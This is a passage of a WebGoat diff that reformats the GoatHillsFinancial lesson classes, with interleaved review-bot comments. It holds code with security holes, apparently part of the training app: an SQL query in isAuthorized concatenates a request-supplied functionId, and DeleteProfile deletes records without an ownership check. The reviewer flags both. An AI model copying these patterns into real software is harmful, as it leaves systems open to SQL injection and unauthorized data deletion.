ResultSet.CONCUR_READ_ONLY); answer_statement.setInt(1, userId); answer_statement.setInt(2, employeeId); ResultSet answer_results = answer_statement.executeQuery(); authorized = answer_results.first(); - } - catch ( SQLException sqle ) + } catch (SQLException sqle) { - s.setMessage( "Error authorizing" ); + s.setMessage("Error authorizing"); sqle.printStackTrace(); } - } - catch ( Exception e ) + } catch (Exception e) { - s.setMessage( "Error authorizing" ); + s.setMessage("Error authorizing"); e.printStackTrace(); } - + return authorized; } - + protected void setStage(WebSession s, String stage) { getLesson().setStage(s, stage); } - protected void setStageComplete(WebSession s, String stage) { + protected void 
setStageComplete(WebSession s, String stage) + { getLesson().setStageComplete(s, stage); } - + protected String getStage(WebSession s) { return getLesson().getStage(s); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java index 67e8a8a2e..81799d83b 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java 
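Review bot: `String query = "SELECT * FROM auth WHERE auth.role in (SELECT roles.role FROM roles WHERE userid = " + employeeId + ") and functionid = '" + functionId + "'";` in isAuthorized still builds the authorization query by concatenating functionId, a String taken from the request path, whereas isAuthorizedForEmployee in the same hunk already binds its inputs through a PreparedStatement; since DefaultLessonAction is the shared base for the GoatHillsFinancial actions, the concatenation looks accidental rather than lesson material, and if it is deliberate a comment saying so would stop the next cleanup from changing it. The rewrite below binds both values; getUserName's query concatenates only an int, but the same form would keep it consistent. Neither Statement nor ResultSet in getUserName, isAuthorized or isAuthorizedForEmployee is ever closed, so each authorization check leaks a cursor until the connection is dropped; closing them in a finally block is the fix available to code of this vintage. The empty `catch (ParameterNotFoundException e)` in isAuthenticated deserves the comment `// no flag in the session means not authenticated` so the silent fallthrough reads as intended.
```java
String query = "SELECT * FROM auth WHERE auth.role in (SELECT roles.role FROM roles WHERE userid = ?) and functionid = ?";
// … unchanged: outer try …
PreparedStatement answer_statement = WebSession.getConnection(s)
        .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
answer_statement.setInt(1, employeeId);
answer_statement.setString(2, functionId);
ResultSet answer_results = answer_statement.executeQuery();
authorized = answer_results.first();
// … unchanged: isAuthorizedForEmployee check, catch blocks …
```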
@@ -1,122 +1,111 @@ + package org.owasp.webgoat.lessons.GoatHillsFinancial; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; - import org.owasp.webgoat.session.ParameterNotFoundException; import org.owasp.webgoat.session.UnauthenticatedException; import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. 
* - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class DeleteProfile extends DefaultLessonAction { - private LessonAction chainedAction; + private LessonAction chainedAction; - public DeleteProfile(GoatHillsFinancial lesson, String lessonName, - String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException, - ValidationException - { - getLesson().setCurrentAction(s, getActionName()); - - int userId = getIntSessionAttribute(s, getLessonName() + "." 
- + GoatHillsFinancial.USER_ID); - int employeeId = s.getParser().getIntParameter( - GoatHillsFinancial.EMPLOYEE_ID); - - if (isAuthenticated(s)) + public DeleteProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) { - deleteEmployeeProfile(s, userId, employeeId); - - try - { - chainedAction.handleRequest(s); - } - catch (UnauthenticatedException ue1) - { - System.out.println("Internal server error"); - ue1.printStackTrace(); - } - catch (UnauthorizedException ue2) - { - System.out.println("Internal server error"); - ue2.printStackTrace(); - } + super(lesson, lessonName, actionName); + this.chainedAction = chainedAction; } - else - throw new UnauthenticatedException(); - } - - public String getNextPage(WebSession s) - { - return GoatHillsFinancial.LISTSTAFF_ACTION; - } - - public void deleteEmployeeProfile(WebSession s, int userId, int employeeId) - throws UnauthorizedException - { - try + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException, ValidationException { - // Note: The password field is ONLY set by ChangePassword - String query = "DELETE FROM employee WHERE userid = " + employeeId; - //System.out.println("Query: " + query); - try - { - Statement statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - statement.executeUpdate(query); - } - catch (SQLException sqle) - { - s.setMessage("Error deleting employee profile"); - sqle.printStackTrace(); - } + getLesson().setCurrentAction(s, getActionName()); + + int userId = getIntSessionAttribute(s, getLessonName() + "." 
+ GoatHillsFinancial.USER_ID); + int employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID); + + if (isAuthenticated(s)) + { + deleteEmployeeProfile(s, userId, employeeId); + + try + { + chainedAction.handleRequest(s); + } catch (UnauthenticatedException ue1) + { + System.out.println("Internal server error"); + ue1.printStackTrace(); + } catch (UnauthorizedException ue2) + { + System.out.println("Internal server error"); + ue2.printStackTrace(); + } + } + else + throw new UnauthenticatedException(); + } - catch (Exception e) + + public String getNextPage(WebSession s) { - s.setMessage("Error deleting employee profile"); - e.printStackTrace(); + return GoatHillsFinancial.LISTSTAFF_ACTION; + } + + public void deleteEmployeeProfile(WebSession s, int userId, int employeeId) throws UnauthorizedException + { + try + { + // Note: The password field is ONLY set by ChangePassword + String query = "DELETE FROM employee WHERE userid = " + employeeId; + // System.out.println("Query: " + query); + try + { + Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + statement.executeUpdate(query); + } catch (SQLException sqle) + { + s.setMessage("Error deleting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error deleting employee profile"); + e.printStackTrace(); + } } - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java index 287799439..618f120a3 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java 
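Review bot: `deleteEmployeeProfile` never closes the `Statement` obtained from `WebSession.getConnection(s)`, so each request leaks a JDBC handle; the same pattern (unclosed `PreparedStatement`/`ResultSet`) recurs in EditProfile.getEmployeeProfile and FindProfile.findEmployeeProfile in this commit. If the build targets Java 7 or later the inner block can become `try (Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY)) { statement.executeUpdate(query); }`, otherwise close it in a `finally`. The method also takes a `userId` it never reads and declares `throws UnauthorizedException` without any path that throws it, so a reader cannot tell whether the absent ownership check is intentional lesson behaviour; a one-line comment stating which would remove the ambiguity. The comment `// Note: The password field is ONLY set by ChangePassword` sits above a `DELETE` that sets no fields at all and should be dropped or reworded.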
@@ -1,132 +1,115 @@ + package org.owasp.webgoat.lessons.GoatHillsFinancial; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; - import org.owasp.webgoat.session.Employee; import org.owasp.webgoat.session.ParameterNotFoundException; import org.owasp.webgoat.session.UnauthenticatedException; import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. 
* - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class EditProfile extends DefaultLessonAction { - public EditProfile(GoatHillsFinancial lesson, String lessonName, - String actionName) - { - super(lesson, lessonName, actionName); - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException - { - getLesson().setCurrentAction(s, getActionName()); - - if (isAuthenticated(s)) + public EditProfile(GoatHillsFinancial lesson, String lessonName, String actionName) { - int userId = getUserId(s); - int employeeId = s.getParser().getIntParameter( - GoatHillsFinancial.EMPLOYEE_ID); - - Employee employee = getEmployeeProfile(s, userId, employeeId); - setSessionAttribute(s, getLessonName() + "." 
- + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee); + super(lesson, lessonName, actionName); } - else - throw new UnauthenticatedException(); - } - public String getNextPage(WebSession s) - { - return GoatHillsFinancial.EDITPROFILE_ACTION; - } - - public Employee getEmployeeProfile(WebSession s, int userId, - int subjectUserId) throws UnauthorizedException - { - Employee profile = null; - - // Query the database for the profile data of the given employee - try + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException { - String query = "SELECT * FROM employee WHERE userid = ?"; + getLesson().setCurrentAction(s, getActionName()); - try - { - PreparedStatement answer_statement = WebSession - .getConnection(s).prepareStatement(query, - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - answer_statement.setInt(1, subjectUserId); - ResultSet answer_results = answer_statement.executeQuery(); - if (answer_results.next()) + if (isAuthenticated(s)) { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), - answer_results.getString("first_name"), - answer_results.getString("last_name"), - answer_results.getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results - .getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */} - } - catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); + int userId = getUserId(s); + int employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID); + + Employee employee = getEmployeeProfile(s, userId, employeeId); + setSessionAttribute(s, getLessonName() + "." 
+ GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee); + } + else + throw new UnauthenticatedException(); } - return profile; - } + public String getNextPage(WebSession s) + { + return GoatHillsFinancial.EDITPROFILE_ACTION; + } + + public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException + { + Employee profile = null; + + // Query the database for the profile data of the given employee + try + { + String query = "SELECT * FROM employee WHERE userid = ?"; + + try + { + PreparedStatement answer_statement = WebSession.getConnection(s) + .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + answer_statement.setInt(1, subjectUserId); + ResultSet answer_results = answer_statement.executeQuery(); + if (answer_results.next()) + { + // Note: Do NOT get the password field. + profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), + answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */} + } catch (SQLException sqle) + { + s.setMessage("Error getting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employee profile"); + e.printStackTrace(); + } + + return profile; + } } 
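Review bot: The reformat keeps the closing brace of the `if (answer_results.next())` block fused to the end of a commented-out debug print (`*/}`), which hides the block boundary from anyone scanning `getEmployeeProfile`; deleting the dead `System.out.println` comment puts the `}` back on its own line. `getEmployeeProfile` returns `null` when no row matches and `handleRequest` stores that result unconditionally via `setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee)`, so downstream readers of the attribute presumably have to cope with a null profile — a `@return` note such as `@return the employee's profile, or null if no such userid exists` would make that explicit. As in DeleteProfile, the `userId` parameter is unused and `UnauthorizedException` is declared but never thrown.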
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java index e8cd6c8c4..5adb844eb 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java @@ -1,9 +1,9 @@ + package org.owasp.webgoat.lessons.GoatHillsFinancial; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; - import org.owasp.webgoat.session.Employee; import org.owasp.webgoat.session.ParameterNotFoundException; import org.owasp.webgoat.session.UnauthenticatedException; 
@@ -11,180 +11,151 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class FindProfile extends DefaultLessonAction { - private LessonAction chainedAction; + private LessonAction chainedAction; - - public FindProfile(GoatHillsFinancial lesson, String lessonName, - String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException, - ValidationException - { - if (isAuthenticated(s)) + public FindProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) { - int userId = getIntSessionAttribute(s, getLessonName() + "." - + GoatHillsFinancial.USER_ID); + super(lesson, lessonName, actionName); + this.chainedAction = chainedAction; + } - String pattern = s.getParser().getRawParameter( - GoatHillsFinancial.SEARCHNAME); + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException, ValidationException + { + if (isAuthenticated(s)) + { + int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID); - findEmployeeProfile(s, userId, pattern); + String pattern = s.getParser().getRawParameter(GoatHillsFinancial.SEARCHNAME); - // Execute the chained Action if the employee was found. 
- if (foundEmployee(s)) - { + findEmployeeProfile(s, userId, pattern); + + // Execute the chained Action if the employee was found. + if (foundEmployee(s)) + { + try + { + chainedAction.handleRequest(s); + } catch (UnauthenticatedException ue1) + { + System.out.println("Internal server error"); + ue1.printStackTrace(); + } catch (UnauthorizedException ue2) + { + System.out.println("Internal server error"); + ue2.printStackTrace(); + } + } + } + else + throw new UnauthenticatedException(); + } + + public String getNextPage(WebSession s) + { + String page = GoatHillsFinancial.SEARCHSTAFF_ACTION; + + if (foundEmployee(s)) page = GoatHillsFinancial.VIEWPROFILE_ACTION; + + return page; + } + + private boolean foundEmployee(WebSession s) + { + boolean found = false; try { - chainedAction.handleRequest(s); - } - catch (UnauthenticatedException ue1) + getIntRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID); + found = true; + } catch (ParameterNotFoundException e) { - System.out.println("Internal server error"); - ue1.printStackTrace(); } - catch (UnauthorizedException ue2) + + return found; + } + + public Employee findEmployeeProfile(WebSession s, int userId, String pattern) throws UnauthorizedException + { + Employee profile = null; + // Clear any residual employee id's in the session now. + removeSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID); + + // Query the database for the profile data of the given employee + try { - System.out.println("Internal server error"); - ue2.printStackTrace(); - } - } - } - else - throw new UnauthenticatedException(); - } + String query = "SELECT * FROM employee WHERE first_name LIKE ? 
OR last_name LIKE ?"; + try + { + PreparedStatement answer_statement = WebSession.getConnection(s) + .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + answer_statement.setString(1, "%" + pattern + "%"); + answer_statement.setString(2, "%" + pattern + "%"); + ResultSet answer_results = answer_statement.executeQuery(); - public String getNextPage(WebSession s) - { - String page = GoatHillsFinancial.SEARCHSTAFF_ACTION; + // Just use the first hit. + if (answer_results.next()) + { + int id = answer_results.getInt("userid"); + // Note: Do NOT get the password field. + profile = new Employee(id, answer_results.getString("first_name"), answer_results + .getString("last_name"), answer_results.getString("ssn"), + answer_results.getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); - if (foundEmployee(s)) - page = GoatHillsFinancial.VIEWPROFILE_ACTION; - - return page; - } - - - private boolean foundEmployee(WebSession s) - { - boolean found = false; - try - { - getIntRequestAttribute(s, getLessonName() + "." - + GoatHillsFinancial.EMPLOYEE_ID); - found = true; - } - catch (ParameterNotFoundException e) - {} - - return found; - } - - - public Employee findEmployeeProfile(WebSession s, int userId, String pattern) - throws UnauthorizedException - { - Employee profile = null; - // Clear any residual employee id's in the session now. - removeSessionAttribute(s, getLessonName() + "." 
- + GoatHillsFinancial.EMPLOYEE_ID); - - // Query the database for the profile data of the given employee - try - { - String query = "SELECT * FROM employee WHERE first_name LIKE ? OR last_name LIKE ?"; - - try - { - PreparedStatement answer_statement = WebSession - .getConnection(s).prepareStatement(query, - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - answer_statement.setString(1, "%" + pattern + "%"); - answer_statement.setString(2, "%" + pattern + "%"); - ResultSet answer_results = answer_statement.executeQuery(); - - // Just use the first hit. - if (answer_results.next()) + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */ + setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer.toString(id)); + } + } catch (SQLException sqle) + { + s.setMessage("Error finding employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) { - int id = answer_results.getInt("userid"); - // Note: Do NOT get the password field. - profile = new Employee(id, answer_results - .getString("first_name"), answer_results - .getString("last_name"), answer_results - .getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results.getString("ccn"), - answer_results.getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */ - setRequestAttribute(s, getLessonName() + "." 
- + GoatHillsFinancial.EMPLOYEE_ID, Integer - .toString(id)); + s.setMessage("Error finding employee profile"); + e.printStackTrace(); } - } - catch (SQLException sqle) - { - s.setMessage("Error finding employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error finding employee profile"); - e.printStackTrace(); - } - return profile; - } + return profile; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java index 44ba5f481..43ad810e4 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java @@ -1,10 +1,10 @@ + package org.owasp.webgoat.lessons.GoatHillsFinancial; import java.util.ArrayList; import java.util.Hashtable; import java.util.List; import java.util.Map; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.html.A; 
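Review bot: `getNextPage` keeps an unbraced one-liner, `if (foundEmployee(s)) page = GoatHillsFinancial.VIEWPROFILE_ACTION;`, and `handleRequest` ends with an unbraced `else throw new UnauthenticatedException();`; since this commit is a style pass, both should be braced like every other conditional in the file (the same `else throw` appears in the DeleteProfile and EditProfile hunks). The empty `catch (ParameterNotFoundException e) { }` in `foundEmployee` is deliberate control flow but reads as a swallowed error; a comment such as `// missing attribute simply means no employee was found` documents the intent. In `findEmployeeProfile` the search term is correctly bound as a parameter, but it is wrapped as `"%" + pattern + "%"` without escaping `%` or `_`, so a blank or wildcard-only search presumably returns the first row of the whole table — worth a comment if that is acceptable for the lesson.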
@@ -16,317 +16,312 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class GoatHillsFinancial extends RandomLessonAdapter { - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); - public final static String DESCRIPTION = "description"; + public final static String DESCRIPTION = "description"; - public final static String DISCIPLINARY_DATE = "disciplinaryDate"; + public final static String DISCIPLINARY_DATE = "disciplinaryDate"; - public final static String DISCIPLINARY_NOTES = "disciplinaryNotes"; + public final static String DISCIPLINARY_NOTES = "disciplinaryNotes"; - public final static String CCN_LIMIT = "ccnLimit"; + public final static String CCN_LIMIT = "ccnLimit"; - public final static String CCN = "ccn"; + public final static String CCN = "ccn"; - public final static String SALARY = "salary"; + public final static String SALARY = "salary"; - public final static String START_DATE = "startDate"; + public final static String START_DATE = "startDate"; - public final static String MANAGER = "manager"; + public final static String MANAGER = "manager"; - public final static String ADDRESS1 = "address1"; + public final static String ADDRESS1 = 
"address1"; - public final static String ADDRESS2 = "address2"; + public final static String ADDRESS2 = "address2"; - public final static String PHONE_NUMBER = "phoneNumber"; + public final static String PHONE_NUMBER = "phoneNumber"; - public final static String TITLE = "title"; + public final static String TITLE = "title"; - public final static String SSN = "ssn"; + public final static String SSN = "ssn"; - public final static String LAST_NAME = "lastName"; + public final static String LAST_NAME = "lastName"; - public final static String FIRST_NAME = "firstName"; + public final static String FIRST_NAME = "firstName"; - public final static String PASSWORD = "password"; + public final static String PASSWORD = "password"; - public final static String EMPLOYEE_ID = "employee_id"; + public final static String EMPLOYEE_ID = "employee_id"; - public final static String USER_ID = "user_id"; + public final static String USER_ID = "user_id"; - public final static String SEARCHNAME = "search_name"; + public final static String SEARCHNAME = "search_name"; - public final static String SEARCHRESULT_ATTRIBUTE_KEY = "SearchResult"; + public final static String SEARCHRESULT_ATTRIBUTE_KEY = "SearchResult"; - public final static String EMPLOYEE_ATTRIBUTE_KEY = "Employee"; + public final static String EMPLOYEE_ATTRIBUTE_KEY = "Employee"; - public final static String STAFF_ATTRIBUTE_KEY = "Staff"; + public final static String STAFF_ATTRIBUTE_KEY = "Staff"; - public final static String LOGIN_ACTION = "Login"; + public final static String LOGIN_ACTION = "Login"; - public final static String LOGOUT_ACTION = "Logout"; + public final static String LOGOUT_ACTION = "Logout"; - public final static String LISTSTAFF_ACTION = "ListStaff"; + public final static String LISTSTAFF_ACTION = "ListStaff"; - public final static String SEARCHSTAFF_ACTION = "SearchStaff"; + public final static String SEARCHSTAFF_ACTION = "SearchStaff"; - public final static String FINDPROFILE_ACTION = "FindProfile"; + 
